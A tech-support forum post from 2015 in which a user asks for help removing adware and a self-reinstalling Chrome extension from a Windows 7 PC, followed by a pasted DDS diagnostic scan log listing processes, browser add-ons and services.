Author Topic: [Resolved - K] Pop ups  (Read 3142 times)

kobra
« on: January 17, 2015, 04:54:47 PM »
Hi, my mom was having issues with popups. I attempted to clean the computer and have not seen any more popups, but I noticed that a "tOPDEALs" extension was installing itself on Chrome after every attempt to remove it.
I have since removed Chrome, but I want to make sure we got everything cleaned off the computer.

DDS Scan results:
DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17496
Run by Admin at 15:48:11 on 2015-01-17
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.5887.4513 [GMT -7:00]
.
AV: Kaspersky Internet Security *Enabled/Updated* {179979E8-273D-D14E-0543-2861940E4886}
SP: Kaspersky Internet Security *Enabled/Updated* {ACF8980C-0107-DEC0-3FF3-1313EF89023B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Kaspersky Internet Security *Enabled* {2FA2F8CD-6D52-D016-2E1C-81546ADD0FFD}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\atieclxx.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe
C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
C:\Windows\system32\SearchIndexer.exe
C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Windows\System32\WUDFHost.exe
C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
C:\Program Files (x86)\Browny02\BrYNSvc.exe
C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Nero\Update\NASvc.exe
C:\Windows\System32\svchost.exe -k secsvcs
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
mStart Page = www.google.com
mWinlogon: Userinit = userinit.exe,
BHO: MSS+ Identifier: {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -
BHO: {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} - <orphaned>
BHO: PlusIEEventHelper Class: {551A852F-39A6-44A7-9C13-AFBEC9185A9D} - C:\Program Files (x86)\Nuance\PDF Viewer Plus\bin\PlusIEContextMenu.dll
BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll
BHO: {b2ba0648-6833-4057-aaa1-bf9c473dd360} - <orphaned>
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL
BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
TB: FromDocToPDF: {c66a678d-5e6c-4af9-8f57-c6192f42cf74} -
uRun: [Sidebar] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe /autoRun
uRunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe
uRunOnce: [ScrSav] C:\Program Files (x86)\Gateway\Screensaver\run_Gateway.exe /default
mRun: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
mRun: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
mRun: [Hotkey Utility] C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
mRun: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
mRun: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
mRun: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
mRun: [IndexSearch] "C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe"
mRun: [PaperPort PTD] "C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe"
mRun: [PPort12reminder] "C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe" -r "C:\ProgramData\ScanSoft\PaperPort\12\Config\Ereg\Ereg.ini"
mRun: [PDFHook] C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe
mRun: [PDF5 Registry Controller] C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe
mRun: [ControlCenter4] C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe /autorun
mRun: [BrStsMon00] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN
dRunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect"
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\EVENTR~1.LNK - C:\Program Files (x86)\The Print Shop 23.1\Remind.exe
StartupFolder: C:\PROGRA~3\MICROS~1\Windows\STARTM~1\Programs\Startup\IMAGEB~1.LNK - C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
DPF: {E4D88471-7ED7-43E1-B290-205559E8EBB2} - hxxps://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
DPF: {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} - hxxps://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
TCP: NameServer = 10.10.10.254
TCP: Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F} : NameServer = 8.8.8.8
TCP: Interfaces\{18BAEE32-7A7F-4151-B2E3-CD66400E704F} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC} : NameServer = 8.8.8.8
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC} : DHCPNameServer = 10.10.10.254
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\C416772756E63656 : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\C474D2C435938303F5162363 : DHCPNameServer = 192.168.43.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\C474D2C435938303F5560336 : DHCPNameServer = 192.168.43.1
TCP: Interfaces\{39C34F84-4F8F-431C-AA97-5BDA129281FC}\D496E64697C4 : DHCPNameServer = 192.168.1.1
Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL
x64-mStart Page = www.google.com
x64-BHO: caoupoNpEaK: {01050D05-D546-B8DC-954D-8334A8A7BF5A} -
x64-BHO: AudioCeonvaeert: {2F344960-763E-9E6C-E973-25241A34D54E} -
x64-BHO: DiscounntLoCaatOr: {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} - C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll
x64-BHO: Content Blocker Plugin: {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
x64-BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
x64-BHO: Virtual Keyboard Plugin: {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-BHO: Safe Money Plugin: {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll
x64-BHO: SaoftiCoup: {b2ba0648-6833-4057-aaa1-bf9c473dd360} - C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll
x64-BHO: PrinCECCoupon: {B4552D3D-6B41-9AF1-3067-72A066972344} -
x64-BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL
x64-BHO: URL Advisor Plugin: {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-IE: {0C4CC089-D306-440D-9772-464E226F6539} - {0BA14598-4178-4CE5-B1F1-B5C6408A3F2E} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
x64-IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
x64-IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
x64-IE: {CCF151D8-D089-449F-A5A4-D9909053F20F} - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll
x64-Filter: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
x64-Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - <orphaned>
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-SSODL: WebCheck - <orphaned>
x64-SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath -
.
============= SERVICES / DRIVERS ===============
.
R0 amd_sata;amd_sata;C:\Windows\System32\drivers\amd_sata.sys [2011-7-20 77952]
R0 amd_xata;amd_xata;C:\Windows\System32\drivers\amd_xata.sys [2011-7-20 37504]
R1 KLIM6;Kaspersky Anti-Virus NDIS 6 Filter;C:\Windows\System32\drivers\klim6.sys [2013-10-8 29792]
R1 klpd;klpd;C:\Windows\System32\drivers\klpd.sys [2013-4-12 15456]
R1 kltdi;kltdi;C:\Windows\System32\drivers\kltdi.sys [2013-5-14 55904]
R1 kneps;kneps;C:\Windows\System32\drivers\kneps.sys [2013-6-6 178272]
R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2011-7-20 202752]
R2 AVP;Kaspersky Anti-Virus Service;C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [2013-10-8 214512]
R2 GREGService;GREGService;C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe [2011-5-29 36456]
R2 IntuitUpdateServiceV4;Intuit Update Service v4;C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe [2013-6-28 14624]
R2 Live Updater Service;Live Updater Service;C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe [2011-7-20 244624]
R2 NAUpdate;Nero Update;C:\Program Files (x86)\Nero\Update\NASvc.exe [2011-3-29 598312]
R2 NOBU;Norton Online Backup;C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2010-6-1 2804568]
R2 PDFProFiltSrvPP;PDFProFiltSrvPP;C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe [2010-3-9 144672]
R3 BrYNSvc;BrYNSvc;C:\Program Files (x86)\Browny02\BrYNSvc.exe [2014-2-23 266240]
R3 klkbdflt;Kaspersky Lab KLKBDFLT;C:\Windows\System32\drivers\klkbdflt.sys [2013-10-8 29280]
R3 klmouflt;Kaspersky Lab KLMOUFLT;C:\Windows\System32\drivers\klmouflt.sys [2013-10-8 29280]
R3 netr28x;Ralink 802.11n Extensible Wireless Driver;C:\Windows\System32\drivers\netr28x.sys [2011-7-20 1014624]
R3 RTL8167;Realtek 8167 NT Driver;C:\Windows\System32\drivers\Rt64win7.sys [2011-7-20 346144]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2014-4-11 103608]
S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2014-4-11 124088]
S2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [2013-12-17 46904]
S2 SkypeUpdate;Skype Updater;C:\Program Files (x86)\Skype\Updater\Updater.exe [2013-10-23 172192]
S3 GamesAppService;GamesAppService;C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe [2010-10-12 206072]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;C:\Windows\System32\ieetwcollector.exe [2014-12-10 114688]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;C:\Windows\System32\drivers\rdpvideominiport.sys [2015-1-13 19456]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2015-1-13 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2015-1-13 30208]
S3 USBAAPL64;Apple Mobile USB Driver;C:\Windows\System32\drivers\usbaapl64.sys [2012-12-13 54784]
S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2012-5-31 1255736]
S4 klflt;klflt;C:\Windows\System32\drivers\klflt.sys [2014-11-24 115296]
S4 wlcrasvc;Windows Live Mesh remote connections service;C:\Program Files\Windows Live\Mesh\wlcrasvc.exe [2010-9-22 57184]
.
=============== Created Last 30 ================
.
2015-01-17 04:48:59   75888   ----a-w-   C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{2C0F3203-CF54-4F10-9682-5E58DA959B59}\offreg.dll
2015-01-17 04:04:59   11870360   ----a-w-   C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{2C0F3203-CF54-4F10-9682-5E58DA959B59}\mpengine.dll
2015-01-15 05:38:26   52224   ----a-w-   C:\Windows\SysWow64\nlaapi.dll
2015-01-15 05:37:34   6584320   ----a-w-   C:\Windows\System32\mstscax.dll
2015-01-15 05:37:34   5703168   ----a-w-   C:\Windows\SysWow64\mstscax.dll
2015-01-13 14:53:01   44544   ----a-w-   C:\Windows\System32\TsUsbGDCoInstaller.dll
2015-01-13 14:53:00   62976   ----a-w-   C:\Windows\System32\tsgqec.dll
2015-01-13 14:53:00   56832   ----a-w-   C:\Windows\System32\drivers\TsUsbFlt.sys
2015-01-13 14:53:00   53248   ----a-w-   C:\Windows\SysWow64\tsgqec.dll
2015-01-13 14:53:00   3072   ----a-w-   C:\Windows\System32\drivers\en-US\tsusbflt.sys.mui
2015-01-13 14:53:00   13824   ----a-w-   C:\Windows\System32\TsUsbRedirectionGroupPolicyControl.exe
2015-01-13 14:53:00   12800   ----a-w-   C:\Windows\System32\TsUsbRedirectionGroupPolicyExtension.dll
2015-01-13 14:52:59   855552   ----a-w-   C:\Windows\SysWow64\rdvidcrl.dll
2015-01-13 14:52:59   56832   ----a-w-   C:\Windows\System32\MsRdpWebAccess.dll
2015-01-13 14:52:59   50176   ----a-w-   C:\Windows\SysWow64\MsRdpWebAccess.dll
2015-01-13 14:52:59   420864   ----a-w-   C:\Windows\System32\wksprt.exe
2015-01-13 14:52:59   18944   ----a-w-   C:\Windows\System32\wksprtPS.dll
2015-01-13 14:52:59   17920   ----a-w-   C:\Windows\SysWow64\wksprtPS.dll
2015-01-13 14:52:59   1147392   ----a-w-   C:\Windows\System32\mstsc.exe
2015-01-13 14:52:59   1068544   ----a-w-   C:\Windows\SysWow64\mstsc.exe
2015-01-13 14:52:59   1057280   ----a-w-   C:\Windows\System32\rdvidcrl.dll
2015-01-13 14:51:54   30208   ----a-w-   C:\Windows\System32\drivers\TsUsbGD.sys
2015-01-13 14:51:54   19456   ----a-w-   C:\Windows\System32\drivers\rdpvideominiport.sys
2015-01-13 14:51:47   243200   ----a-w-   C:\Windows\System32\rdpudd.dll
2015-01-13 14:51:47   228864   ----a-w-   C:\Windows\System32\rdpendp_winip.dll
2015-01-13 14:51:47   192000   ----a-w-   C:\Windows\SysWow64\rdpendp_winip.dll
2015-01-13 04:15:36   --------   d-----w-   C:\Windows\Microsoft Antimalware
2015-01-07 16:57:55   --------   d-----w-   C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj
2015-01-07 02:51:42   129752   ----a-w-   C:\Windows\System32\drivers\67F23A27.sys
2015-01-07 02:50:39   129752   ----a-w-   C:\Windows\System32\drivers\12D43959.sys
2015-01-06 04:04:08   --------   d-----w-   C:\ProgramData\DiscounntLoCaatOr
2015-01-06 04:03:38   --------   d-----w-   C:\ProgramData\SaoftiCoup
.
==================== Find3M  ====================
.
2015-01-15 06:56:12   71344   ----a-w-   C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-01-15 06:56:12   701616   ----a-w-   C:\Windows\SysWow64\FlashPlayerApp.exe
2015-01-15 05:38:25   129752   ----a-w-   C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-01-08 16:55:52   298120   ------w-   C:\Windows\System32\MpSigStub.exe
2014-12-19 03:06:55   210432   ----a-w-   C:\Windows\System32\profsvc.dll
2014-12-19 01:46:45   141312   ----a-w-   C:\Windows\System32\drivers\mrxdav.sys
2014-12-13 05:09:01   144384   ----a-w-   C:\Windows\System32\ieUnatt.exe
2014-12-13 03:33:44   115712   ----a-w-   C:\Windows\SysWow64\ieUnatt.exe
2014-12-12 05:35:10   5553592   ----a-w-   C:\Windows\System32\ntoskrnl.exe
2014-12-12 05:31:49   503808   ----a-w-   C:\Windows\System32\srcore.dll
2014-12-12 05:31:49   50176   ----a-w-   C:\Windows\System32\srclient.dll
2014-12-12 05:31:22   296960   ----a-w-   C:\Windows\System32\rstrui.exe
2014-12-12 05:11:44   3971512   ----a-w-   C:\Windows\SysWow64\ntkrnlpa.exe
2014-12-12 05:11:43   3916728   ----a-w-   C:\Windows\SysWow64\ntoskrnl.exe
2014-12-12 05:07:44   43008   ----a-w-   C:\Windows\SysWow64\srclient.dll
2014-12-11 17:47:17   87040   ----a-w-   C:\Windows\System32\TSWbPrxy.exe
2014-12-06 04:17:27   303616   ----a-w-   C:\Windows\System32\nlasvc.dll
2014-12-06 03:50:18   156672   ----a-w-   C:\Windows\SysWow64\ncsi.dll
2014-12-04 02:50:55   413184   ----a-w-   C:\Windows\System32\generaltel.dll
2014-12-04 02:50:45   741376   ----a-w-   C:\Windows\System32\invagent.dll
2014-12-04 02:50:40   396800   ----a-w-   C:\Windows\System32\devinv.dll
2014-12-04 02:50:38   830976   ----a-w-   C:\Windows\System32\appraiser.dll
2014-12-04 02:50:37   227328   ----a-w-   C:\Windows\System32\aepdu.dll
2014-12-04 02:50:37   192000   ----a-w-   C:\Windows\System32\aepic.dll
2014-12-04 02:44:48   1083392   ----a-w-   C:\Windows\System32\aeinv.dll
2014-12-01 23:28:44   1232040   ----a-w-   C:\Windows\System32\aitstatic.exe
2014-11-25 21:46:58   29280   ----a-w-   C:\Windows\System32\drivers\klkbdflt.sys
2014-11-25 21:46:58   178272   ----a-w-   C:\Windows\System32\drivers\kneps.sys
2014-11-25 21:46:57   458336   ----a-w-   C:\Windows\System32\drivers\kl1.sys
2014-11-25 21:46:57   115296   ----a-w-   C:\Windows\System32\drivers\klflt.sys
2014-11-22 03:06:23   2724864   ----a-w-   C:\Windows\System32\mshtml.tlb
2014-11-22 03:06:11   4096   ----a-w-   C:\Windows\System32\ieetwcollectorres.dll
2014-11-22 02:50:39   66560   ----a-w-   C:\Windows\System32\iesetup.dll
2014-11-22 02:50:10   580096   ----a-w-   C:\Windows\System32\vbscript.dll
2014-11-22 02:49:54   48640   ----a-w-   C:\Windows\System32\ieetwproxystub.dll
2014-11-22 02:48:20   88064   ----a-w-   C:\Windows\System32\MshtmlDac.dll
2014-11-22 02:35:29   114688   ----a-w-   C:\Windows\System32\ieetwcollector.exe
2014-11-22 02:34:51   814080   ----a-w-   C:\Windows\System32\jscript9diag.dll
2014-11-22 02:34:07   6039552   ----a-w-   C:\Windows\System32\jscript9.dll
2014-11-22 02:26:31   968704   ----a-w-   C:\Windows\System32\MsSpellCheckingFacility.exe
2014-11-22 02:20:44   2724864   ----a-w-   C:\Windows\SysWow64\mshtml.tlb
2014-11-22 02:14:16   77824   ----a-w-   C:\Windows\System32\JavaScriptCollectionAgent.dll
2014-11-22 02:07:43   501248   ----a-w-   C:\Windows\SysWow64\vbscript.dll
2014-11-22 02:07:17   62464   ----a-w-   C:\Windows\SysWow64\iesetup.dll
2014-11-22 02:06:32   47616   ----a-w-   C:\Windows\SysWow64\ieetwproxystub.dll
2014-11-22 02:05:02   64000   ----a-w-   C:\Windows\SysWow64\MshtmlDac.dll
2014-11-22 01:54:30   620032   ----a-w-   C:\Windows\SysWow64\jscript9diag.dll
2014-11-22 01:47:10   1359360   ----a-w-   C:\Windows\System32\mshtmlmedia.dll
2014-11-22 01:46:58   2125312   ----a-w-   C:\Windows\System32\inetcpl.cpl
2014-11-22 01:40:04   60416   ----a-w-   C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2014-11-22 01:29:26   4299264   ----a-w-   C:\Windows\SysWow64\jscript9.dll
2014-11-22 01:28:21   2358272   ----a-w-   C:\Windows\System32\wininet.dll
2014-11-22 01:22:49   2052096   ----a-w-   C:\Windows\SysWow64\inetcpl.cpl
2014-11-22 01:21:57   1155072   ----a-w-   C:\Windows\SysWow64\mshtmlmedia.dll
2014-11-22 01:00:20   1888256   ----a-w-   C:\Windows\SysWow64\wininet.dll
2014-11-21 13:14:22   63704   ----a-w-   C:\Windows\System32\drivers\mwac.sys
2014-11-21 13:14:12   93400   ----a-w-   C:\Windows\System32\drivers\mbamchameleon.sys
2014-11-21 13:14:08   25816   ----a-w-   C:\Windows\System32\drivers\mbam.sys
2014-11-19 11:31:16   1217192   ----a-w-   C:\Windows\SysWow64\FM20.DLL
2014-11-11 03:09:06   1424384   ----a-w-   C:\Windows\System32\WindowsCodecs.dll
2014-11-11 03:08:52   241152   ----a-w-   C:\Windows\System32\pku2u.dll
2014-11-11 03:08:48   728064   ----a-w-   C:\Windows\System32\kerberos.dll
2014-11-11 02:44:45   1230336   ----a-w-   C:\Windows\SysWow64\WindowsCodecs.dll
2014-11-11 02:44:32   186880   ----a-w-   C:\Windows\SysWow64\pku2u.dll
2014-11-11 02:44:25   550912   ----a-w-   C:\Windows\SysWow64\kerberos.dll
2014-11-11 01:46:26   119296   ----a-w-   C:\Windows\System32\drivers\tdx.sys
2014-11-08 03:16:08   2048   ----a-w-   C:\Windows\System32\tzres.dll
2014-11-08 02:45:09   2048   ----a-w-   C:\Windows\SysWow64\tzres.dll
2014-10-30 02:03:43   165888   ----a-w-   C:\Windows\System32\charmap.exe
2014-10-30 01:45:43   155136   ----a-w-   C:\Windows\SysWow64\charmap.exe
2014-10-25 01:57:59   77824   ----a-w-   C:\Windows\System32\packager.dll
2014-10-25 01:32:37   67584   ----a-w-   C:\Windows\SysWow64\packager.dll
.
============= FINISH: 15:48:48.50 ===============


Attach.txt results:
.
UNLESS SPECIFICALLY INSTRUCTED, DO NOT POST THIS LOG.
IF REQUESTED, ZIP IT UP & ATTACH IT
.
DDS (Ver_2012-11-20.01)
.
Microsoft Windows 7 Home Premium
Boot Device: \Device\HarddiskVolume2
Install Date: 5/29/2012 5:19:30 AM
System Uptime: 1/17/2015 12:50:31 PM (3 hours ago)
.
Motherboard: Gateway |  | DX4350
